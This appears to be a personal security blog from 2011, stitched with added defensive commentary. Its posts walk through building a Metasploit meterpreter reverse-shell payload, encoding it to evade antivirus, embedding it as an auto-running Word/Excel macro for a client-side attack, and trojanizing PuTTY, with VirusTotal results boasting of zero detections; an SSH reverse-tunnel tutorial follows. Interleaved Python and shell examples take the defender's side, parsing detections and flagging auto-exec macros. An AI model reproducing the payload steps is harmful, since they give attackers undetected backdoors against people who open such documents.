This is how I embedded it.
root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@LM:/opt/metasploit3/msf#
root@LM:/opt/metasploit3/msf3# mv payload.exe tools/
root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 73802 bytes of EXE into a VBA script
#payload.vbs
Now open MS Word/Excel and perform the following steps.
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor; if you are using Word/Excel 2007, go to View, Macros, then enter a name like “lancit” and select “Create”.
A Visual Basic editor will pop up; paste the output of payload.vbs into it and save it. Put any text you like in the actual Word document itself. The purpose is a client-side attack.
The output looks like this:
Sub Auto_open()
.
.
.
.
.
.
End Sub
Then you will get a nice backdoor that antivirus does not detect.
Happy trying...
Tuesday, May 24, 2011
(Backdoor Part 2) At last.. Payload CAN'T BE DETECTED..!!
Why can't it be detected? At first I encoded it as an *.exe, then I manipulated it using Ruby to embed it inside a *.vbs file, and below is the result from VirusTotal.
File name:payload.vbs
Submission date:2011-05-23 17:32:43 (UTC)
Current status:finished
Result:0/ 42 (0.0%)
Additional information
MD5 : 8e54f3b36507c7c3f4a80ee336e367ae
SHA1 : ed8ba524a09494dcd7f86dbe5859339706264911
SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d
ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmwAvvR5CbS/9R+86RruNbLgduePXI
File size : 297145 bytes
First seen: 2011-05-23 17:32:43
Last seen : 2011-05-23 17:32:43
TrID:
Unknown!
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
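The 0/42 above and the macro procedure in the post before it make one point from the defender's side: the same bytes, once re-encoded as a VBA byte array inside a .vbs, get a brand-new file hash, so engines that only match the hash or a signature of the .vbs text see nothing, while decoding the array back to bytes restores the match. The Python below is an added example, not code from the post, from Metasploit or from exe2vba; the VBA layout it scans is a simplified assumption, the sample bytes are a constructed stand-in (not a real executable), and the auto-exec macro list is a hypothetical subset.

```python
import hashlib
import re

# Added example, not code from the original post or from Metasploit/exe2vba.
# It models the page's observation: re-encoding a file as a VBA byte array
# changes the file hash of the .vbs, but decoding the array back to bytes
# restores a hash match. The VBA layout below is a simplified assumption,
# not exe2vba's exact output.

# Constructed stand-in for a payload file: a few PE-header-like bytes,
# not a real executable.
SAMPLE_BYTES = b"MZ\x90\x00\x03\x00\x00\x00"

# Constructed VBA text carrying those bytes as &H literals inside an
# auto-executing macro. It writes nothing and runs nothing; it exists
# only to be scanned.
VBA_SAMPLE = """\
Sub Auto_open()
    Dim buf(0 To 7) As Byte
    buf(0) = &H4D: buf(1) = &H5A: buf(2) = &H90: buf(3) = &H00
    buf(4) = &H03: buf(5) = &H00: buf(6) = &H00: buf(7) = &H00
End Sub
"""

# Procedure names Office runs without a click (hypothetical subset of the
# list tools such as olevba use).
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(Auto_?Open|Auto_?Close|Document_Open|Workbook_Open|AutoExec)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)

# One-byte VBA hex literal: &H followed by exactly two hex digits.
HEX_BYTE_RE = re.compile(r"&H([0-9A-Fa-f]{2})(?![0-9A-Fa-f])")


def sha256hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def auto_exec_macros(vba_text: str) -> list:
    """Names of auto-executing Sub procedures found in the VBA source."""
    return AUTOEXEC_RE.findall(vba_text)


def extract_embedded_bytes(vba_text: str) -> bytes:
    """Decode every one-byte &H literal, in source order, back into raw bytes."""
    return bytes(int(h, 16) for h in HEX_BYTE_RE.findall(vba_text))


def triage(vba_text: str, known_bad_sha256: set) -> dict:
    """Check both the .vbs text hash and the decoded-payload hash against a denylist."""
    text_hash = sha256hex(vba_text.encode("utf-8"))
    payload = extract_embedded_bytes(vba_text)
    return {
        "auto_exec": auto_exec_macros(vba_text),
        "embedded_bytes": len(payload),
        "text_hash_known_bad": text_hash in known_bad_sha256,
        "payload_hash_known_bad": sha256hex(payload) in known_bad_sha256,
    }


if __name__ == "__main__":
    # Denylist holds the hash of the original bytes, as an AV hash feed would.
    denylist = {sha256hex(SAMPLE_BYTES)}
    print(triage(VBA_SAMPLE, denylist))
```

Run on the constructed sample, `text_hash_known_bad` is false (the .vbs is a new file) while `payload_hash_known_bad` is true and `auto_exec` lists `Auto_open`; that pairing, an auto-executing macro plus a decodable byte blob, is the signal to alert on even when no engine has a signature for the wrapper.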
Monday, May 23, 2011
(Backdoor Part 1) Not a Successful Embedded PAYLOAD in PuTTY. But Close Enough.. :D
Hi Guys,
Tonight I managed to embed a payload inside PuTTY, and according to VirusTotal it was detected (results below).
File name:putty01.exe
Result:18/ 42 (42.9%)
The AVs that detected it are:
AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen
Avast 4.8.1351.0 2011.05.22 Win32:Vykuk
Avast5 5.0.677.0 2011.05.22 Win32:Vykuk
BitDefender 7.2 2011.05.22 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan
Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D
Comodo 8797 2011.05.22 Heur.Corrupt.PE
DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196
eSafe 7.0.17.0 2011.05.22 Suspicious File
F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D
F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC
GData 22 2011.05.22 Backdoor.Shell.AC
Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A
NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG
Norman 6.07.07 2011.05.22 W32/Swrort.A
nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752
Sophos 4.65.0 2011.05.22 Mal/Swrort-D
VIPRE 9357 2011.05.22 Trojan.Win32.Swrort.B (v)
As you can see from the result for Microsoft Anti-Malware (I think) :P it is detected as a Trojan.
This embedding project is still in progress and I will keep you updated if I'm not too lazy -.-'
Oops.. It's late already.. off to bed now.. cheerio...
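Reading an 18/42 result is easier when the vendor names are collapsed into families, because what matters for triage is the consensus (here, Swrort) rather than each engine's spelling. The Python below is an added example, not code from the post or from VirusTotal: it parses the engine/version/date/verdict lines exactly as they appear above, counts detections, and derives a rough family token; the token-stripping heuristic is an assumption of this example, not a VirusTotal feature.

```python
import re
from collections import Counter

# Added example, not from the original post or from VirusTotal. Parses the
# post's result lines, counts detections and groups verdicts by a rough
# family token. The family heuristic is an assumption of this example.

# The post's own 18 result lines, used as the sample input.
VT_LINES = """\
AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen
Avast 4.8.1351.0 2011.05.22 Win32:Vykuk
Avast5 5.0.677.0 2011.05.22 Win32:Vykuk
BitDefender 7.2 2011.05.22 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan
Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D
Comodo 8797 2011.05.22 Heur.Corrupt.PE
DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196
eSafe 7.0.17.0 2011.05.22 Suspicious File
F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D
F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC
GData 22 2011.05.22 Backdoor.Shell.AC
Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A
NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG
Norman 6.07.07 2011.05.22 W32/Swrort.A
nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752
Sophos 4.65.0 2011.05.22 Mal/Swrort-D
VIPRE 9357 2011.05.22 Trojan.Win32.Swrort.B (v)
"""

# engine  version  YYYY.MM.DD  verdict-with-spaces
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d{4}\.\d{2}\.\d{2})\s+(.+?)\s*$")

# Platform/type/filler tokens that carry no family information (assumed list).
NOISE = {"w32", "win32", "trojan", "backdoor", "mal", "tr", "heur",
         "a", "variant", "of", "gen", "file", "v"}


def parse_results(text: str) -> list:
    """One dict per engine line; lines that do not fit the layout are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append({"engine": m.group(1), "version": m.group(2),
                         "updated": m.group(3), "verdict": m.group(4)})
    return rows


def family(verdict: str) -> str:
    """First token of the verdict that is not platform/type noise, lower-cased."""
    for tok in re.split(r"[./:\\\s-]+", verdict):
        tok = tok.strip("()").lower()
        if tok and tok not in NOISE:
            return tok
    return verdict.lower()


def summarize(text: str, total_engines: int = 42) -> dict:
    """Detection count, ratio and a Counter of family tokens."""
    rows = parse_results(text)
    return {
        "detections": len(rows),
        "total": total_engines,
        "ratio": len(rows) / total_engines,
        "families": Counter(family(r["verdict"]) for r in rows),
    }


if __name__ == "__main__":
    s = summarize(VT_LINES)
    print(f'{s["detections"]}/{s["total"]} engines')
    for name, n in s["families"].most_common():
        print(f"  {name:<12} {n}")
```

On the post's data this yields 6 engines agreeing on swrort, 4 on shell, 2 each on vykuk and a generic suspicious verdict, and one each for crypt, corrupt, packed and rozena; the generic and packer-style verdicts are the ones that say "unknown packed binary" rather than naming the family.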
Monday, May 16, 2011
What is SSH and How to Configure an SSH Reverse Tunnel
A simple Explanation of SSH.
Secure SHell
Connectivity tools for secure communications over the internet. SSH is a replacement for telnet and rlogin. All communication is encrypted.
Common uses of SSH:
1. You want to access a web interface that lies behind a firewall
2. You want to secure your communications when you are on a public WLAN
Steps taken (by problem)
=========
1. Problem: the server you want to access can only be reached via VPN
Solution: create a reverse tunnel
Log in to that server over your VPN and, from there, run:
ssh -R 9995:localhost:22 your.ssh-server.net
Once you are logged in on your.ssh-server.net you can now access the remote
server without VPN:
ssh -p 9995 localhost
2. Forward all your traffic through a tunnel
Connect to your server first:
ssh -D 8888 your.ssh-server.net
Define a SOCKS proxy in your browser settings with host '127.0.0.1' and port '8888'
Now all your traffic appears to come from that host!
Enjoy!
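The two commands above work as written, but in practice a tunnel that silently fails to bind, dies without notice, or listens on every interface of the ssh server is worse than no tunnel. The shell script below is an added example, not from the post: it builds both command lines with the options a practitioner adds (`-N`, `ExitOnForwardFailure`, `ServerAliveInterval`, explicit loopback binds), rejects bad port numbers, and reads the `GatewayPorts` value from an sshd_config, which is the server-side setting that decides whether a `-R` listener stays on loopback. Host names and ports are the post's; the sshd_config fragment is constructed; nothing here opens a connection.

```shell
#!/bin/sh
# Added example; not from the original post. Builds the two ssh command lines
# the post describes with the options a practitioner normally adds, validates
# the port numbers, and reads the sshd_config setting that decides who can
# reach a -R listener. Nothing here opens a connection.

valid_port() {
    # TCP port: digits only, 1..65535
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then
        return 0
    fi
    return 1
}

# Reverse tunnel: run on the VPN-only server. Publishes that server's port $2
# (22 in the post) as 127.0.0.1:$1 on the ssh server $3.
reverse_tunnel_cmd() {
    remote_port=$1; local_port=$2; server=$3
    if ! valid_port "$remote_port" || ! valid_port "$local_port"; then
        return 1
    fi
    # -N: no remote shell, tunnel only
    # ExitOnForwardFailure=yes: exit if the port is taken instead of silently
    #   connecting without the forward
    # ServerAliveInterval=30: notice a dead link so a supervisor can restart it
    # 127.0.0.1 bind: keep the listener on the server's loopback
    printf 'ssh -N -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -R 127.0.0.1:%s:localhost:%s %s\n' \
        "$remote_port" "$local_port" "$server"
}

# SOCKS proxy for the public-WLAN case, bound to loopback so no other host
# on the WLAN can ride the tunnel.
socks_proxy_cmd() {
    port=$1; server=$2
    if ! valid_port "$port"; then
        return 1
    fi
    printf 'ssh -N -D 127.0.0.1:%s %s\n' "$port" "$server"
}

# Reads sshd_config text on stdin and prints the effective GatewayPorts value.
# "no" (the default) keeps -R listeners on loopback; "yes" or "clientspecified"
# allows a -R port to be bound on every interface. sshd uses the first value
# it sees for a keyword, so the first non-comment match wins.
gateway_ports_setting() {
    awk 'tolower($1) == "gatewayports" && v == "" { v = tolower($2) }
         END { if (v == "") v = "no"; print v }'
}

# Constructed sshd_config fragment for the demonstration.
SAMPLE_SSHD_CONFIG='# GatewayPorts yes
Port 22
GatewayPorts clientspecified'

reverse_tunnel_cmd 9995 22 your.ssh-server.net
socks_proxy_cmd 8888 your.ssh-server.net
printf '%s\n' "$SAMPLE_SSHD_CONFIG" | gateway_ports_setting
```

Two caveats the post leaves out: with `-D`, the browser still resolves DNS locally unless it is told to send name lookups through the SOCKS proxy (in Firefox, `network.proxy.socks_remote_dns`), so "all your traffic" is only true once that is set; and on the server side, `GatewayPorts no` together with `AllowTcpForwarding` is what keeps a user's reverse tunnel from becoming a listener reachable by everyone.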